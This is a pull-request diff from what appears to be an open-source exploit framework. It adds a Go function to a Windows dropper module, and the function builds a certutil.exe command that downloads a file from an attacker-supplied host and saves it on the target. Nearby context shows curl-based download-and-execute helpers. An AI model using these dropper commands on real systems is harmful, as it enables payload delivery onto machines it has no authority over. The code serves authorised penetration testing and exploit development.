Merge pull request #409 from vulncheck-oss/certutildownloadonly

Added dropper function: CertutilDownloadOnly with docs

Author: j-baines

payload/dropper/windows.go

@@ -18,6 +18,18 @@ func (win *WindowsPayload) CurlHTTPDownloadOnly(lhost string, lport int, ssl boo
 	return fmt.Sprintf("curl.exe -so %s http://%s:%d/%s", output, lhost, lport, downloadFile)
 }
 
+// Much like CurlHTTPDownloadOnly, this function will generate the certutil.exe command to download a file and save it to the provided location.
+//
+//	downloadCmd := dropper.Windows.CertutilHTTPDownloadOnly(httpFileServer.HTTPAddr, httpFileServer.HTTPPort, httpFileServer.TLS, httpFileServer.GetRandomName(""), destFilePath)
+func (win *WindowsPayload) CertutilHTTPDownloadOnly(lhost string, lport int, ssl bool, downloadFile string, outputPath string) string {
+	uri := fmt.Sprintf("http://%s:%d/%s", lhost, lport, downloadFile)
+	if ssl {
+		uri = strings.Replace(uri, "http://", "https://", 1)
+	}
+
+	return fmt.Sprintf("certutil.exe -urlcache -split -f %s %s", uri, outputPath)
+}
+
 // Download a remote file with curl.exe, execute it, and delete it (after execution).
 func (win *WindowsPayload) CurlHTTP(lhost string, lport int, ssl bool, downloadFile string) string {
 	output := `%TEMP%\` + random.RandLetters(3) + ".exe"